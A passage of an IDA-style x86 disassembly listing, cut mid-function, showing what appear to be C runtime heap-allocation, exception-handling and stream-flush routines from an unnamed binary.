		jnz	short loc_4062AA
		push	dword ptr [esi+10h]
		push	edi
		push	dword_4275A8
		call	ds:dword_41D108	; RtlFreeHeap
		jmp	short loc_406245
; ---------------------------------------------------------------------------

loc_4062AA:				; CODE XREF: sub_406214+82j
		or	dword ptr [esi+8], 0FFFFFFFFh
		mov	[esi], edi
		mov	[esi+4], edi
		inc	dword_43643C
		mov	eax, [esi+10h]
		or	dword ptr [eax], 0FFFFFFFFh
		mov	eax, esi

loc_4062C1:				; CODE XREF: sub_406214+33j
		pop	edi
		pop	esi
		retn
sub_406214	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4062C4	proc near		; CODE XREF: sub_4066A9+D6p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+8]
		push	ebx
		push	esi
		mov	esi, [ecx+10h]
		push	edi
		xor	ebx, ebx
		jmp	short loc_4062DC
; ---------------------------------------------------------------------------

loc_4062D9:				; CODE XREF: sub_4062C4+1Aj
		add	eax, eax
		inc	ebx

loc_4062DC:				; CODE XREF: sub_4062C4+13j
		test	eax, eax
		jge	short loc_4062D9
		mov	eax, ebx
		imul	eax, 204h
		lea	eax, [eax+esi+144h]
		push	3Fh
		mov	[ebp+var_8], eax
		pop	edx

loc_4062F5:				; CODE XREF: sub_4062C4+3Bj
		mov	[eax+8], eax
		mov	[eax+4], eax
		add	eax, 8
		dec	edx
		jnz	short loc_4062F5
		push	4
		mov	edi, ebx
		push	1000h
		shl	edi, 0Fh
		add	edi, [ecx+0Ch]
		push	8000h
		push	edi
		call	ds:off_41D154
		test	eax, eax
		jnz	short loc_406328
		or	eax, 0FFFFFFFFh
		jmp	loc_4063C5
; ---------------------------------------------------------------------------

loc_406328:				; CODE XREF: sub_4062C4+5Aj
		lea	edx, [edi+7000h]
		cmp	edi, edx
		mov	[ebp+var_4], edx
		ja	short loc_406378
		mov	ecx, edx
		sub	ecx, edi
		shr	ecx, 0Ch
		lea	eax, [edi+10h]
		inc	ecx

loc_406340:				; CODE XREF: sub_4062C4+AFj
		or	dword ptr [eax-8], 0FFFFFFFFh
		or	dword ptr [eax+0FECh], 0FFFFFFFFh
		lea	edx, [eax+0FFCh]
		mov	[eax], edx
		lea	edx, [eax-1004h]
		mov	dword ptr [eax-4], 0FF0h
		mov	[eax+4], edx
		mov	dword ptr [eax+0FE8h], 0FF0h
		add	eax, 1000h
		dec	ecx
		jnz	short loc_406340
		mov	edx, [ebp+var_4]

loc_406378:				; CODE XREF: sub_4062C4+6Fj
		mov	eax, [ebp+var_8]
		add	eax, 1F8h
		lea	ecx, [edi+0Ch]
		mov	[eax+4], ecx
		mov	[ecx+8], eax
		lea	ecx, [edx+0Ch]
		mov	[eax+8], ecx
		mov	[ecx+4], eax
		and	dword ptr [esi+ebx*4+44h], 0
		xor	edi, edi
		inc	edi
		mov	[esi+ebx*4+0C4h], edi
		mov	al, [esi+43h]
		mov	cl, al
		inc	cl
		test	al, al
		mov	eax, [ebp+arg_0]
		mov	[esi+43h], cl
		jnz	short loc_4063B5
		or	[eax+4], edi

loc_4063B5:				; CODE XREF: sub_4062C4+ECj
		mov	edx, 80000000h
		mov	ecx, ebx
		shr	edx, cl
		not	edx
		and	[eax+8], edx
		mov	eax, ebx

loc_4063C5:				; CODE XREF: sub_4062C4+5Fj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4062C4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4063CA	proc near		; CODE XREF: sub_40DE1D+77p

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	ecx, [ebp+arg_0]
		mov	eax, [ecx+10h]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	edi, [ebp+arg_4]
		mov	edx, edi
		sub	edx, [ecx+0Ch]
		add	esi, 17h
		shr	edx, 0Fh
		mov	ecx, edx
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_C], ecx
		mov	ecx, [edi-4]
		and	esi, 0FFFFFFF0h
		dec	ecx
		cmp	esi, ecx
		lea	edi, [ecx+edi-4]
		mov	ebx, [edi]
		mov	[ebp+arg_8], ecx
		mov	[ebp+var_4], ebx
		jle	loc_40656C
		test	bl, 1
		jnz	loc_406565
		add	ebx, ecx
		cmp	esi, ebx
		jg	loc_406565
		mov	ecx, [ebp+var_4]
		sar	ecx, 4
		dec	ecx
		cmp	ecx, 3Fh
		mov	[ebp+var_8], ecx
		jbe	short loc_40643F
		push	3Fh
		pop	ecx
		mov	[ebp+var_8], ecx

loc_40643F:				; CODE XREF: sub_4063CA+6Dj
		mov	ebx, [edi+4]
		cmp	ebx, [edi+8]
		jnz	short loc_40648A
		cmp	ecx, 20h
		mov	ebx, 80000000h
		jnb	short loc_40646B
		shr	ebx, cl
		mov	ecx, [ebp+var_8]
		lea	ecx, [ecx+eax+4]
		not	ebx
		and	[eax+edx*4+44h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_40648A
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_40648A
; ---------------------------------------------------------------------------

loc_40646B:				; CODE XREF: sub_4063CA+85j
		add	ecx, 0FFFFFFE0h
		shr	ebx, cl
		mov	ecx, [ebp+var_8]
		lea	ecx, [ecx+eax+4]
		not	ebx
		and	[eax+edx*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_40648A
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_40648A:				; CODE XREF: sub_4063CA+7Bj
					; sub_4063CA+98j ...
		mov	ecx, [edi+8]
		mov	ebx, [edi+4]
		mov	[ecx+4], ebx
		mov	ecx, [edi+4]
		mov	edi, [edi+8]
		mov	[ecx+8], edi
		mov	ecx, [ebp+arg_8]
		sub	ecx, esi
		add	[ebp+var_4], ecx
		cmp	[ebp+var_4], 0
		jle	loc_406553
		mov	edi, [ebp+var_4]
		mov	ecx, [ebp+arg_4]
		sar	edi, 4
		dec	edi
		cmp	edi, 3Fh
		lea	ecx, [ecx+esi-4]
		jbe	short loc_4064C4
		push	3Fh
		pop	edi

loc_4064C4:				; CODE XREF: sub_4063CA+F5j
		mov	ebx, [ebp+var_C]
		lea	ebx, [ebx+edi*8]
		mov	[ebp+arg_8], ebx
		mov	ebx, [ebx+4]
		mov	[ecx+4], ebx
		mov	ebx, [ebp+arg_8]
		mov	[ecx+8], ebx
		mov	[ebx+4], ecx
		mov	ebx, [ecx+4]
		mov	[ebx+8], ecx
		mov	ebx, [ecx+4]
		cmp	ebx, [ecx+8]
		jnz	short loc_406541
		mov	cl, [edi+eax+4]
		mov	byte ptr [ebp+arg_8+3],	cl
		inc	cl
		cmp	edi, 20h
		mov	[edi+eax+4], cl
		jnb	short loc_406518
		cmp	byte ptr [ebp+arg_8+3],	0
		jnz	short loc_406510
		mov	ecx, edi
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], ebx

loc_406510:				; CODE XREF: sub_4063CA+136j
		lea	eax, [eax+edx*4+44h]
		mov	ecx, edi
		jmp	short loc_406538
; ---------------------------------------------------------------------------

loc_406518:				; CODE XREF: sub_4063CA+130j
		cmp	byte ptr [ebp+arg_8+3],	0
		jnz	short loc_40652E
		lea	ecx, [edi-20h]
		mov	ebx, 80000000h
		shr	ebx, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], ebx

loc_40652E:				; CODE XREF: sub_4063CA+152j
		lea	eax, [eax+edx*4+0C4h]
		lea	ecx, [edi-20h]

loc_406538:				; CODE XREF: sub_4063CA+14Cj
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax], edx

loc_406541:				; CODE XREF: sub_4063CA+11Ej
		mov	edx, [ebp+arg_4]
		mov	ecx, [ebp+var_4]
		lea	eax, [edx+esi-4]
		mov	[eax], ecx
		mov	[ecx+eax-4], ecx
		jmp	short loc_406556
; ---------------------------------------------------------------------------

loc_406553:				; CODE XREF: sub_4063CA+DEj
		mov	edx, [ebp+arg_4]

loc_406556:				; CODE XREF: sub_4063CA+187j
		lea	eax, [esi+1]
		mov	[edx-4], eax
		mov	[edx+esi-8], eax
		jmp	loc_4066A1
; ---------------------------------------------------------------------------

loc_406565:				; CODE XREF: sub_4063CA+50j
					; sub_4063CA+5Aj
		xor	eax, eax
		jmp	loc_4066A4
; ---------------------------------------------------------------------------

loc_40656C:				; CODE XREF: sub_4063CA+47j
		jge	loc_4066A1
		mov	ebx, [ebp+arg_4]
		sub	[ebp+arg_8], esi
		lea	ecx, [esi+1]
		mov	[ebx-4], ecx
		lea	ebx, [ebx+esi-4]
		mov	esi, [ebp+arg_8]
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		mov	[ebp+arg_4], ebx
		mov	[ebx-4], ecx
		jbe	short loc_406597
		push	3Fh
		pop	esi

loc_406597:				; CODE XREF: sub_4063CA+1C8j
		test	byte ptr [ebp+var_4], 1
		jnz	loc_406621
		mov	esi, [ebp+var_4]
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		jbe	short loc_4065B0
		push	3Fh
		pop	esi

loc_4065B0:				; CODE XREF: sub_4063CA+1E1j
		mov	ecx, [edi+4]
		cmp	ecx, [edi+8]
		jnz	short loc_4065FA
		cmp	esi, 20h
		mov	ebx, 80000000h
		jnb	short loc_4065DB
		mov	ecx, esi
		shr	ebx, cl
		lea	esi, [esi+eax+4]
		not	ebx
		and	[eax+edx*4+44h], ebx
		dec	byte ptr [esi]
		jnz	short loc_4065F7
		mov	ecx, [ebp+arg_0]
		and	[ecx], ebx
		jmp	short loc_4065F7
; ---------------------------------------------------------------------------

loc_4065DB:				; CODE XREF: sub_4063CA+1F6j
		lea	ecx, [esi-20h]
		shr	ebx, cl
		lea	ecx, [esi+eax+4]
		not	ebx
		and	[eax+edx*4+0C4h], ebx
		dec	byte ptr [ecx]
		jnz	short loc_4065F7
		mov	ecx, [ebp+arg_0]
		and	[ecx+4], ebx

loc_4065F7:				; CODE XREF: sub_4063CA+208j
					; sub_4063CA+20Fj ...
		mov	ebx, [ebp+arg_4]

loc_4065FA:				; CODE XREF: sub_4063CA+1ECj
		mov	ecx, [edi+8]
		mov	esi, [edi+4]
		mov	[ecx+4], esi
		mov	esi, [edi+8]
		mov	ecx, [edi+4]
		mov	[ecx+8], esi
		mov	esi, [ebp+arg_8]
		add	esi, [ebp+var_4]
		mov	[ebp+arg_8], esi
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		jbe	short loc_406621
		push	3Fh
		pop	esi

loc_406621:				; CODE XREF: sub_4063CA+1D1j
					; sub_4063CA+252j
		mov	ecx, [ebp+var_C]
		lea	ecx, [ecx+esi*8]
		mov	edi, [ecx+4]
		mov	[ebx+8], ecx
		mov	[ebx+4], edi
		mov	[ecx+4], ebx
		mov	ecx, [ebx+4]
		mov	[ecx+8], ebx
		mov	ecx, [ebx+4]
		cmp	ecx, [ebx+8]
		jnz	short loc_406698
		mov	cl, [esi+eax+4]
		mov	byte ptr [ebp+arg_4+3],	cl
		inc	cl
		cmp	esi, 20h
		mov	[esi+eax+4], cl
		jnb	short loc_40666F
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_406667
		mov	ecx, esi
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx], edi

loc_406667:				; CODE XREF: sub_4063CA+28Dj
		lea	eax, [eax+edx*4+44h]
		mov	ecx, esi
		jmp	short loc_40668F
; ---------------------------------------------------------------------------

loc_40666F:				; CODE XREF: sub_4063CA+287j
		cmp	byte ptr [ebp+arg_4+3],	0
		jnz	short loc_406685
		lea	ecx, [esi-20h]
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	[ecx+4], edi

loc_406685:				; CODE XREF: sub_4063CA+2A9j
		lea	eax, [eax+edx*4+0C4h]
		lea	ecx, [esi-20h]

loc_40668F:				; CODE XREF: sub_4063CA+2A3j
		mov	edx, 80000000h
		shr	edx, cl
		or	[eax], edx

loc_406698:				; CODE XREF: sub_4063CA+275j
		mov	eax, [ebp+arg_8]
		mov	[ebx], eax
		mov	[eax+ebx-4], eax

loc_4066A1:				; CODE XREF: sub_4063CA+196j
					; sub_4063CA:loc_40656Cj
		xor	eax, eax
		inc	eax

loc_4066A4:				; CODE XREF: sub_4063CA+19Dj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4063CA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4066A9	proc near		; CODE XREF: sub_403A51+28p
					; sub_40DCFF+88p ...

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		mov	eax, dword_43643C
		mov	ecx, [ebp+arg_0]
		imul	eax, 14h
		add	eax, dword_436440
		add	ecx, 17h
		and	ecx, 0FFFFFFF0h
		mov	[ebp+var_10], ecx
		sar	ecx, 4
		push	ebx
		dec	ecx
		cmp	ecx, 20h
		push	esi
		push	edi
		jge	short loc_4066E0
		or	esi, 0FFFFFFFFh
		shr	esi, cl
		or	[ebp+var_8], 0FFFFFFFFh
		jmp	short loc_4066ED
; ---------------------------------------------------------------------------

loc_4066E0:				; CODE XREF: sub_4066A9+2Aj
		add	ecx, 0FFFFFFE0h
		or	edx, 0FFFFFFFFh
		xor	esi, esi
		shr	edx, cl
		mov	[ebp+var_8], edx

loc_4066ED:				; CODE XREF: sub_4066A9+35j
		mov	ecx, dword_436448
		mov	ebx, ecx
		jmp	short loc_406708
; ---------------------------------------------------------------------------

loc_4066F7:				; CODE XREF: sub_4066A9+64j
		mov	edx, [ebx+4]
		mov	edi, [ebx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_40670F
		add	ebx, 14h

loc_406708:				; CODE XREF: sub_4066A9+4Cj
		cmp	ebx, eax
		mov	[ebp+arg_0], ebx
		jb	short loc_4066F7

loc_40670F:				; CODE XREF: sub_4066A9+5Aj
		cmp	ebx, eax
		jnz	short loc_406792
		mov	ebx, dword_436440
		jmp	short loc_40672C
; ---------------------------------------------------------------------------

loc_40671B:				; CODE XREF: sub_4066A9+88j
		mov	edx, [ebx+4]
		mov	edi, [ebx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_406733
		add	ebx, 14h

loc_40672C:				; CODE XREF: sub_4066A9+70j
		cmp	ebx, ecx
		mov	[ebp+arg_0], ebx
		jb	short loc_40671B

loc_406733:				; CODE XREF: sub_4066A9+7Ej
		cmp	ebx, ecx
		jnz	short loc_406792
		jmp	short loc_406745
; ---------------------------------------------------------------------------

loc_406739:				; CODE XREF: sub_4066A9+9Ej
		cmp	dword ptr [ebx+8], 0
		jnz	short loc_406749
		add	ebx, 14h
		mov	[ebp+arg_0], ebx

loc_406745:				; CODE XREF: sub_4066A9+8Ej
		cmp	ebx, eax
		jb	short loc_406739

loc_406749:				; CODE XREF: sub_4066A9+94j
		cmp	ebx, eax
		jnz	short loc_40677E
		mov	ebx, dword_436440
		jmp	short loc_40675E
; ---------------------------------------------------------------------------

loc_406755:				; CODE XREF: sub_4066A9+BAj
		cmp	dword ptr [ebx+8], 0
		jnz	short loc_406765
		add	ebx, 14h

loc_40675E:				; CODE XREF: sub_4066A9+AAj
		cmp	ebx, ecx
		mov	[ebp+arg_0], ebx
		jb	short loc_406755

loc_406765:				; CODE XREF: sub_4066A9+B0j
		cmp	ebx, ecx
		jnz	short loc_40677E
		call	sub_406214
		mov	ebx, eax
		test	ebx, ebx
		mov	[ebp+arg_0], ebx
		jnz	short loc_40677E

loc_406777:				; CODE XREF: sub_4066A9+E7j
		xor	eax, eax
		jmp	loc_406987
; ---------------------------------------------------------------------------

loc_40677E:				; CODE XREF: sub_4066A9+A2j
					; sub_4066A9+BEj ...
		push	ebx
		call	sub_4062C4
		pop	ecx
		mov	ecx, [ebx+10h]
		mov	[ecx], eax
		mov	eax, [ebx+10h]
		cmp	dword ptr [eax], 0FFFFFFFFh
		jz	short loc_406777

loc_406792:				; CODE XREF: sub_4066A9+68j
					; sub_4066A9+8Cj
		mov	dword_436448, ebx
		mov	eax, [ebx+10h]
		mov	edx, [eax]
		cmp	edx, 0FFFFFFFFh
		mov	[ebp+var_4], edx
		jz	short loc_4067B9
		mov	ecx, [eax+edx*4+0C4h]
		mov	edi, [eax+edx*4+44h]
		and	ecx, [ebp+var_8]
		and	edi, esi
		or	ecx, edi
		jnz	short loc_4067E2

loc_4067B9:				; CODE XREF: sub_4066A9+FAj
		and	[ebp+var_4], 0
		mov	edx, [eax+0C4h]
		lea	ecx, [eax+44h]

loc_4067C6:				; CODE XREF: sub_4066A9+134j
		mov	edi, [ecx]
		and	edx, [ebp+var_8]
		and	edi, esi
		or	edx, edi
		jnz	short loc_4067DF
		inc	[ebp+var_4]
		mov	edx, [ecx+84h]
		add	ecx, 4
		jmp	short loc_4067C6
; ---------------------------------------------------------------------------

loc_4067DF:				; CODE XREF: sub_4066A9+126j
		mov	edx, [ebp+var_4]

loc_4067E2:				; CODE XREF: sub_4066A9+10Ej
		mov	ecx, edx
		imul	ecx, 204h
		lea	ecx, [ecx+eax+144h]
		mov	[ebp+var_C], ecx
		mov	ecx, [eax+edx*4+44h]
		xor	edi, edi
		and	ecx, esi
		jnz	short loc_406810
		mov	ecx, [eax+edx*4+0C4h]
		and	ecx, [ebp+var_8]
		push	20h
		pop	edi
		jmp	short loc_406810
; ---------------------------------------------------------------------------

loc_40680D:				; CODE XREF: sub_4066A9+169j
		add	ecx, ecx
		inc	edi

loc_406810:				; CODE XREF: sub_4066A9+153j
					; sub_4066A9+162j
		test	ecx, ecx
		jge	short loc_40680D
		mov	ecx, [ebp+var_C]
		mov	edx, [ecx+edi*8+4]
		mov	ecx, [edx]
		sub	ecx, [ebp+var_10]
		mov	esi, ecx
		sar	esi, 4
		dec	esi
		cmp	esi, 3Fh
		mov	[ebp+var_8], ecx
		jle	short loc_406831
		push	3Fh
		pop	esi

loc_406831:				; CODE XREF: sub_4066A9+183j
		cmp	esi, edi
		jz	loc_40693A
		mov	ecx, [edx+4]
		cmp	ecx, [edx+8]
		jnz	short loc_40689D
		cmp	edi, 20h
		mov	ebx, 80000000h
		jge	short loc_406871
		mov	ecx, edi
		shr	ebx, cl
		mov	ecx, [ebp+var_4]
		lea	edi, [eax+edi+4]
		not	ebx
		mov	[ebp+var_14], ebx
		and	ebx, [eax+ecx*4+44h]
		mov	[eax+ecx*4+44h], ebx
		dec	byte ptr [edi]
		jnz	short loc_40689A
		mov	ecx, [ebp+var_14]
		mov	ebx, [ebp+arg_0]
		and	[ebx], ecx
		jmp	short loc_40689D
; ---------------------------------------------------------------------------

loc_406871:				; CODE XREF: sub_4066A9+1A0j
		lea	ecx, [edi-20h]
		shr	ebx, cl
		mov	ecx, [ebp+var_4]
		lea	ecx, [eax+ecx*4+0C4h]
		lea	edi, [eax+edi+4]
		not	ebx
		and	[ecx], ebx
		dec	byte ptr [edi]
		mov	[ebp+var_14], ebx
		jnz	short loc_40689A
		mov	ebx, [ebp+arg_0]
		mov	ecx, [ebp+var_14]
		and	[ebx+4], ecx
		jmp	short loc_40689D
; ---------------------------------------------------------------------------

loc_40689A:				; CODE XREF: sub_4066A9+1BCj
					; sub_4066A9+1E4j
		mov	ebx, [ebp+arg_0]

loc_40689D:				; CODE XREF: sub_4066A9+196j
					; sub_4066A9+1C6j ...
		cmp	[ebp+var_8], 0
		mov	ecx, [edx+8]
		mov	edi, [edx+4]
		mov	[ecx+4], edi
		mov	ecx, [edx+4]
		mov	edi, [edx+8]
		mov	[ecx+8], edi
		jz	loc_406946
		mov	ecx, [ebp+var_C]
		lea	ecx, [ecx+esi*8]
		mov	edi, [ecx+4]
		mov	[edx+8], ecx
		mov	[edx+4], edi
		mov	[ecx+4], edx
		mov	ecx, [edx+4]
		mov	[ecx+8], edx
		mov	ecx, [edx+4]
		cmp	ecx, [edx+8]
		jnz	short loc_406937
		mov	cl, [esi+eax+4]
		mov	byte ptr [ebp+arg_0+3],	cl
		inc	cl
		cmp	esi, 20h
		mov	[esi+eax+4], cl
		jge	short loc_40690E
		cmp	byte ptr [ebp+arg_0+3],	0
		jnz	short loc_4068FC
		mov	edi, 80000000h
		mov	ecx, esi
		shr	edi, cl
		or	[ebx], edi

loc_4068FC:				; CODE XREF: sub_4066A9+246j
		mov	ecx, esi
		mov	edi, 80000000h
		shr	edi, cl
		mov	ecx, [ebp+var_4]
		or	[eax+ecx*4+44h], edi
		jmp	short loc_406937
; ---------------------------------------------------------------------------

loc_40690E:				; CODE XREF: sub_4066A9+240j
		cmp	byte ptr [ebp+arg_0+3],	0
		jnz	short loc_406921
		lea	ecx, [esi-20h]
		mov	edi, 80000000h
		shr	edi, cl
		or	[ebx+4], edi

loc_406921:				; CODE XREF: sub_4066A9+269j
		mov	ecx, [ebp+var_4]
		lea	edi, [eax+ecx*4+0C4h]
		lea	ecx, [esi-20h]
		mov	esi, 80000000h
		shr	esi, cl
		or	[edi], esi

loc_406937:				; CODE XREF: sub_4066A9+22Ej
					; sub_4066A9+263j
		mov	ecx, [ebp+var_8]

loc_40693A:				; CODE XREF: sub_4066A9+18Aj
		test	ecx, ecx
		jz	short loc_406949
		mov	[edx], ecx
		mov	[ecx+edx-4], ecx
		jmp	short loc_406949
; ---------------------------------------------------------------------------

loc_406946:				; CODE XREF: sub_4066A9+20Aj
		mov	ecx, [ebp+var_8]

loc_406949:				; CODE XREF: sub_4066A9+293j
					; sub_4066A9+29Bj
		mov	esi, [ebp+var_10]
		add	edx, ecx
		lea	ecx, [esi+1]
		mov	[edx], ecx
		mov	[edx+esi-4], ecx
		mov	esi, [ebp+var_C]
		mov	ecx, [esi]
		test	ecx, ecx
		lea	edi, [ecx+1]
		mov	[esi], edi
		jnz	short loc_40697F
		cmp	ebx, dword_4275AC
		jnz	short loc_40697F
		mov	ecx, [ebp+var_4]
		cmp	ecx, dword_436450
		jnz	short loc_40697F
		and	dword_4275AC, 0

loc_40697F:				; CODE XREF: sub_4066A9+2BAj
					; sub_4066A9+2C2j ...
		mov	ecx, [ebp+var_4]
		mov	[eax], ecx
		lea	eax, [edx+4]

loc_406987:				; CODE XREF: sub_4066A9+D0j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
sub_4066A9	endp

; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4069F0	proc near		; DATA XREF: __SEH_prolog4o

var_11		= byte ptr -11h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00408A81 SIZE 00000019 BYTES

		sub	esp, 14h
		push	ebx
		mov	ebx, [esp+18h+arg_4]
		push	ebp
		push	esi
		mov	esi, [ebx+8]
		xor	esi, dword_423064
		push	edi
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		mov	[esp+24h+var_11], 0
		mov	[esp+24h+var_C], 1
		lea	edi, [ebx+10h]
		jz	short loc_406A28
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402AD0

loc_406A28:				; CODE XREF: sub_4069F0+29j
		mov	ecx, [esi+0Ch]
		mov	eax, [esi+8]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402AD0
		mov	eax, [esp+24h+arg_0]
		test	byte ptr [eax+4], 66h
		jnz	loc_406B65
		mov	ebp, [ebx+0Ch]
		cmp	ebp, 0FFFFFFFEh
		mov	ecx, [esp+24h+arg_8]
		lea	edx, [esp+24h+var_8]
		mov	[esp+24h+var_8], eax
		mov	[esp+24h+var_4], ecx
		mov	[ebx-4], edx
		jz	short loc_406ABF

loc_406A61:				; CODE XREF: sub_4069F0+A2j
		lea	eax, [ebp+ebp*2+0]
		mov	ecx, [esi+eax*4+14h]
		test	ecx, ecx
		lea	ebx, [esi+eax*4+10h]
		mov	eax, [ebx]
		mov	[esp+24h+var_10], eax
		jz	short loc_406A8D
		mov	edx, edi
		call	sub_408A6A
		test	eax, eax
		mov	[esp+24h+var_11], 1
		jl	short loc_406ACB
		jg	short loc_406AD5
		mov	eax, [esp+24h+var_10]

loc_406A8D:				; CODE XREF: sub_4069F0+85j
		cmp	eax, 0FFFFFFFEh
		mov	ebp, eax
		jnz	short loc_406A61
		cmp	[esp+24h+var_11], 0
		jz	short loc_406ABF

loc_406A9B:				; CODE XREF: sub_4069F0+E3j
					; sub_4069F0+191j
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		jz	short loc_406AAF
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402AD0

loc_406AAF:				; CODE XREF: sub_4069F0+B0j
		mov	ecx, [esi+0Ch]
		mov	eax, [esi+8]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402AD0

loc_406ABF:				; CODE XREF: sub_4069F0+6Fj
					; sub_4069F0+A9j ...
		mov	eax, [esp+24h+var_C]
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		add	esp, 14h
		retn
; ---------------------------------------------------------------------------

loc_406ACB:				; CODE XREF: sub_4069F0+95j
		mov	[esp+24h+var_C], 0
		jmp	short loc_406A9B
; ---------------------------------------------------------------------------

loc_406AD5:				; CODE XREF: sub_4069F0+97j
		mov	ecx, [esp+24h+arg_0]
		cmp	dword ptr [ecx], 0E06D7363h
		jnz	short loc_406B0B
		cmp	ds:off_41DC2C, 0
		jz	short loc_406B0B
		push	offset off_41DC2C
		call	sub_40D002
		add	esp, 4
		test	eax, eax
		jz	short loc_406B0B
		mov	edx, [esp+24h+arg_0]
		push	1
		push	edx
		call	ds:off_41DC2C
		add	esp, 8

loc_406B0B:				; CODE XREF: sub_4069F0+EFj
					; sub_4069F0+F8j ...
		mov	ecx, [esp+24h+arg_4]
		call	sub_408A9A
		mov	eax, [esp+24h+arg_4]
		cmp	[eax+0Ch], ebp
		jz	short loc_406B30
		push	offset dword_423064
		push	edi
		mov	edx, ebp
		mov	ecx, eax
		call	sub_408AB4
		mov	eax, [esp+24h+arg_4]

loc_406B30:				; CODE XREF: sub_4069F0+12Bj
		mov	ecx, [esp+24h+var_10]
		mov	[eax+0Ch], ecx
		mov	eax, [esi]
		cmp	eax, 0FFFFFFFEh
		jz	short loc_406B4B
		mov	ecx, [esi+4]
		add	ecx, edi
		xor	ecx, [eax+edi]
		call	sub_402AD0

loc_406B4B:				; CODE XREF: sub_4069F0+14Cj
		mov	ecx, [esi+0Ch]
		mov	edx, [esi+8]
		add	ecx, edi
		xor	ecx, [edx+edi]
		call	sub_402AD0
		mov	ecx, [ebx+8]
		mov	edx, edi
		jmp	loc_408A81
; ---------------------------------------------------------------------------

loc_406B65:				; CODE XREF: sub_4069F0+50j
		cmp	dword ptr [ebx+0Ch], 0FFFFFFFEh
		jz	loc_406ABF
		push	offset dword_423064
		push	edi
		mov	ecx, ebx
		mov	edx, 0FFFFFFFEh
		call	sub_408AB4
		jmp	loc_406A9B
sub_4069F0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_406B86	proc near		; CODE XREF: sub_402EAE+9Fp
					; sub_403475+6Ep ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		push	esi
		mov	esi, [ebp+arg_4]
		push	esi
		call	sub_408DD0
		mov	[ebp+arg_4], eax
		mov	eax, [esi+0Ch]
		test	al, 82h
		pop	ecx
		jnz	short loc_406BB6
		call	sub_405B83
		mov	dword ptr [eax], 9

loc_406BAA:				; CODE XREF: sub_406B86+3Fj
		or	dword ptr [esi+0Ch], 20h
		or	eax, 0FFFFFFFFh
		jmp	loc_406CE3
; ---------------------------------------------------------------------------

loc_406BB6:				; CODE XREF: sub_406B86+17j
		test	al, 40h
		jz	short loc_406BC7
		call	sub_405B83
		mov	dword ptr [eax], 22h
		jmp	short loc_406BAA
; ---------------------------------------------------------------------------

loc_406BC7:				; CODE XREF: sub_406B86+32j
		push	ebx
		xor	ebx, ebx
		test	al, 1
		jz	short loc_406BE4
		test	al, 10h
		mov	[esi+4], ebx
		jz	loc_406C5E
		mov	ecx, [esi+8]
		and	eax, 0FFFFFFFEh
		mov	[esi], ecx
		mov	[esi+0Ch], eax

loc_406BE4:				; CODE XREF: sub_406B86+46j
		mov	eax, [esi+0Ch]
		and	eax, 0FFFFFFEFh
		or	eax, 2
		test	ax, 10Ch
		mov	[esi+0Ch], eax
		mov	[esi+4], ebx
		mov	[ebp+var_4], ebx
		jnz	short loc_406C28
		call	sub_408434
		add	eax, 20h
		cmp	esi, eax
		jz	short loc_406C14
		call	sub_408434
		add	eax, 40h
		cmp	esi, eax
		jnz	short loc_406C21

loc_406C14:				; CODE XREF: sub_406B86+80j
		push	[ebp+arg_4]
		call	sub_40D8F0
		test	eax, eax
		pop	ecx
		jnz	short loc_406C28

